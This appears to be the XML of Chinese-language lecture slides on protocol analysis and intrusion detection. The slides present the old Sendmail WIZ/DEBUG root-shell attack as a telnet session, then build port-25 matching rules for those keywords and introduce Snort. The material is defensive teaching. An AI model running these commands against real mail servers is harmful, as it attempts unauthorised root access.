            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 160  650d 0a0d 0a                              e....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171011" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9363A2E3-2571-48D0-A9B1-427509F8FAA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="152400"/>
            <a:ext cx="7793038" cy="685800"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议分析</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A8E7AF95-3C3B-4A77-BBDC-13DF5BF7EE8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一个攻击检测实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172035" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113B93A2-4A95-4509-8597-5A3CF47F47FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2133600"/>
            <a:ext cx="7086600" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>老版本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞利用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$ telnet mail.victim.com 25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1"/>
              <a:t>WIZ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或者</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1"/>
              <a:t>DEBUG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t># </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>直接获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>rootshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a: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30DE8EF-5D2E-42B1-80D4-175AED82B236}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>简单的匹配</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173059" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1165BAC9-9FB7-453C-B3A0-E57C31CC6A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2209800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>检查每个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是否包含：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WIZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>		| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DEBUG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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840F5EE0-E4A5-4A5E-BE7A-353FCF6CFF22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>检查端口号</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174083" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47BB31C8-2C04-45E8-9E79-3C9377AAD941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2209800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缩小匹配范围</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Port 25:{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WIZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>		| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DEBUG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A882E66-F370-43EB-A0E4-0F6BC7007676}"/>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44B08988-1E47-4020-8DFD-68F65E998254}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>方法二：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>		       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>技术含量非常高，攻击形式多样化！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>在已披露的重大攻击事件中，大多利用漏洞进行远程入侵攻击！</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xEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11571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5715">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11571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90DD5CB2-704F-4C2E-B997-FAD434FDBD0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>深入决策树</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175107" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23189530-EDA1-4A2F-809A-30FE0767C8C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2133600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>只判断客户端发送部分</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Port 25:{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>		Client-sends: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WIZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>		Client-sends: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DEBUG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    }</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6FED3F2D-6FC7-4DC1-A758-A75C14F3F9D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：实用网络入侵检测工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214019" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE204A51-957A-44CF-9BE9-3A008F39B97C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="2017713"/>
            <a:ext cx="8343900" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Snort </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是一个用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>语言编写的开放源代码的软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是一个跨平台的，轻量级的网络入侵软件，基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>libpcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的数据包嗅探器和日志记录工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>采用基于规则的网络信息搜索机制，对数据包进行内容的模式匹配，从中发现入侵和探测行为。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="959197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AA43910E-9A79-48D6-ABA7-F1D5EDBCBC8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
